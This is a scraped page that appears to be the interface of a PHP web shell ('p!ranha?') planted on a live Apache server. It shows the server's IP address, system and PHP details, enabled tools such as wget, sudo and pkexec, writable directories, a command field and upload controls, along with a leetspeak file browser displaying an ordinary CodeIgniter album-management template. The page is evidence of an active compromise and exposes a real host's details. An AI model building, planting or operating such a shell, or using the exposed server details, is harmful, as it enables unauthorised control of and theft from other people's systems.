p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/newsigniter/application/views/back/pages/media/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/newsigniter/application/views/back/pages/media/album.php
<div class="container">
   <div class="row">
      <div class="col">
         <h3 class="page-header">Album Management</h3>
      </div>
   </div>

   <div class="row mt-3">
      <div class="col">
         <button type="buton" class="btn btn-success btn-sm" onclick="add_album()">
               <i class="fas fa-plus"></i> Add
         </button>

         <button class="btn btn-outline-secondary btn-sm" onclick="reload_table()">
               <i class="fas fa-sync-alt"></i> Reload
         </button>
      </div>
   </div>


  <br>

   <div class="table-responsive">
      <table id="tableAlbum" class="table table-striped table-bordered"  cellspacing="0" width="100%">
         <thead>
         <tr>
            <th>#</th>
            <th>Album Name</th>
            <th>Photo</th>
            <th>URL Album</th>
            <th>Active</th>
            <th>Action</th>
         </tr>
         </thead>
         <tbody>
         
         </tbody>
      </table>
   </div>

</div>

<!-- Modal -->
<div class="modal fade" id="modalAlbum" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="modal-title">Edit Category</h5>
        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body">
        <form action="#" id="form" class="form-horizontal" id="form">
        
            <input type="hidden" name="id" id="id">

            <div class="form-group row">
               <label for="title" class="col-sm-3 col-form-label">Album Name</label>
               <div class="col-sm-9">
                  <input type="text" class="form-control" id="album_name" name="album_name">
               </div>
            </div> 

            <div class="form-group row" id="photo-preview">
               <label class="col-sm-3 col-form-label">Photo</label>
               <div class="col-sm-9">
                  (No photo)
               </div>
            </div>

            <div class="form-group row">
               <label class="col-sm-3 col-form-label" id="label-photo">Upload Photo</label>
               <div class="col-sm-9">
                  <input name="photo" type="file">
               </div>
            </div>

            <div class="form-group row">
               <label for="Active" class="col-sm-3 col-form-label">Active</label>
               <div class="col-sm-9">
                  <select class="form-control" id="is_active" name="is_active">
                     <option value="Y">Yes</option> 
                     <option value="N">No</option>
                  </select>
               </div>
            </div>

        </form>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-sm btn-secondary" data-dismiss="modal">Close</button>
        <button type="button" class="btn btn-sm btn-primary" onclick="save()" id="btn_save">Save</button>
      </div>
    </div>
  </div>
</div>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 03 2025 03:29:10
0 / 0
0755
album-datatable.php
4.417 KB
May 22 2021 15:57:24
0 / 0
0644
album.php
3.092 KB
May 22 2021 12:02:22
0 / 0
0644
banner-datatable.php
2.954 KB
March 18 2025 06:25:56
0 / 0
0644
banner.php
2.71 KB
March 18 2025 06:25:16
0 / 0
0644
gallery-datatable.php
4.964 KB
May 22 2021 15:57:40
0 / 0
0644
gallery.php
3.967 KB
May 22 2021 12:04:32
0 / 0
0644